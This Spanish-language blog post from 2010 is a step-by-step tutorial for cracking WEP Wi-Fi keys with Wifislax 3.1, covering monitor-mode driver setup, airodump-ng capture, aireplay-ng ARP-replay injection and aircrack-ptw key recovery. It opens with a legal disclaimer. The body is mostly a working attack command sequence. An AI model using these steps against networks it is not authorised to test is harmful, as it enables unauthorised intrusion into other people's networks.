jueves, 29 de abril de 2010

Seguridad Wireless con Wifislax 3.1 y tarjeta Intel Pro Wireless 2200BG

Conectarse a la red del vecino de forma ilícita está prohibido por la ley. Sirva esta entrada sólo para poner a prueba las redes a las que se os está permitida la conexión, haciendo notar que las encriptaciones WEP deben quedarse en el pasado por su alta vulnerabilidad. No me hago responsable del mal uso del contenido de esta publicación.


Después de mucho buscar y probar, WifiSlax es el único que ha sido capaz de reconocerme la tarjeta Intel pro Wireless 2200bg que tiene mi viejo portátil, y todo a la primera.
A continuación se muestran los pasos a seguir para resolver claves WEP con chipset ipw2200bg y Wifislax 3.1.


Enlace de descarga directa de la imagen ISO de WifiSlax 3.1:



Después de quemar la descarga a un Cd, reiniciamos y arrancamos el Wifislax. Nos pedirá Login (root) y Password (toor), e iniciará en modo texto, sin escritorio. Para iniciar el escritorio Fluxbox introducir lo siguente:

#startx

Una vez dentro abrimos una primera terminal de tres que se van a necesitar activas.


TERMINAL I

Con el siguiente comando eliminamos el módulo que utiliza por defecto:


#rmmod ipw2200

Con este otro instalamos el driver que permite inyectar paquetes:

#modprobe ipw2200 rtap_iface=1

Comprobamos que la interfaz está activa:

#iwconfig

Escaneamos la red buscando un punto de conexión que nos interese, y detenemos con Ctrl+C:

#airodump-ng rtap0

Anotamos el canal (CH) el MAC (BSSID) y el nombre de red (ESSID), y ejecutar de nuevo el airodump, esta vez capturando paquetes del canal en que se encuentre nuestro objetivo:

#airodump-ng -c # -w wep rtap0

(donde # se sustituye por el canal que anotamos antes / wep es el nombre que le damos al archivo en que captura paquetes) 


TERMINAL II

Para asociarnos a esa red:

#iwconfig eth1 essid "nombre red" key 5555555555 (un número cualquiera) 

Comprobamos que estamos asociados a esa red:

#iwconfig

Ahora queda poner el aireplay a inyectar paquetes, y esperar... :

#aireplay-ng -3 -x 1024 -g 1000000 -b MAC OBJETIVO -h NUESTRA MAC -i rtap0 eth1


TERMINAL III

Cuando tengamos un número de paquetes elevado, en esta tercera terminal hacemos uso del aircrack-ptw:

#aircrack-ptw wep-01.cap

(si hiciésemos una segunda captura el archivo se llamaría wep-02.cap, y así consecutivamente)  


¿Qué tiempo se tarda? Depende. Si hay alguien más conectado viendo cosas en youtube, o con el Emule puesto, en menos de 5 minutos provablemente se resuelva por que la captura de paquetes aumenta considerablemente. Y puede que otras veces mucho más. 

1 comentario:

  1. Actualmente, con la versión 10.04 de Ubuntu la reconoce a la primera, y con instalarle el aircrack-ng ya se puede poner en modo monitor con el comando >sudo airmon-ng start eth1.

    ResponderEliminar